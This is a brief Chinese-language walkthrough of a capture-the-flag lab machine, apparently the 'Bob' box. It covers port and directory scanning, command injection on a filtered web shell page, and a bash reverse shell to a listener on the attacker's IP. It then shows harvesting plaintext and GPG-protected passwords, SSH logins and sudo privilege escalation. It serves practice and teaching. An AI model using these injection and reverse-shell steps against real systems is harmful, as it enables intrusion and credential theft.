查看mac地址
扫描ip
端口扫描
nmap -p- -A 192.168.154.133
目录扫描
dirsearch -u http://192.168.154.133
拼接访问
访问到/dev_shell.php是有用 的
这个页面存在过滤 输入whoami | ls
访问.bak 会下载下来 查看 发现过滤的命令
尝试反弹shell
输入
whoami | pwd&echo "bash -i >& /dev/tcp/192.168.154.130/4444 0>&1" | bash
kail上进行监听4444端口
反弹成功
进行提权
cd /home
ls
cd bob
ls -al
查看文件 得到jc和seb的密码
cat .old_passwordfile.html
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
在 Documents 下发现一个加密的文件 login.txt.gpg 和一个目录 Secret
cd Documents
ls
在 /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here 下,发现了 notes.sh
这是一个藏头诗,密钥为 HARPOCRATES
返回 DOcuments目录下,解密 login.txt.gpg ,没有权限
ssh登录其他用户尝试
ssh jc@192.168.111.142 -p 25468
Qwerty
解密 得到bob的密码
cd /home/bob/Documents
gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
bob:b0bcat_
再看看 elliot 的家目录,发现一个theadminisdumb.txt 文件
查看内容,这里提到他把密码改为了 theadminisdumb
ssh连接bob用户
ssh bob@192.168.154.133 -p 25468
b0bcat_
显示为all,所有命令都可以
直接输入sudo su
成功提权